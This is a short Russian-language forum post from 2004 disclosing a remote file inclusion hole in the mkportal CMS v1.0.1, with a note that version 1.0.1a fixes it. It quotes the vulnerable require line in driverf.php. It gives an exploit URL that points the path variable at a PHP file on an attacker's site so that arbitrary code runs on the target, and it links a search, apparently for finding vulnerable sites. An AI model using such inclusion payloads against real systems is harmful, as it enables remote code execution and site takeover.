Тема
:
Дыра в cms "mkportal" v1.0.1
Показать сообщение отдельно
#
1
21.07.2004, 00:39
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0
Репутация:
82
внимание! в 1.0.1а это уже исправили
файл
http://[target]/mkportal/include/driverf.php
содержит
что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>
Исходный код
</td></tr><tr><td id="CODE">require $MK_PATH."/conf_global.php";[/QUOTE]<span id='postcolor'>
эксплойт:
http://[target]/mkporta....TH=http
где:
http://[hacker_site]/conf_global.php
любой php код
http://www.google.ru/search?....%BA&lr=
zFailure
Посмотреть профиль
Репутация
Отправить личное сообщение для zFailure
Посетить домашнюю страницу zFailure
Найти все сообщения от zFailure
Добавить в друзья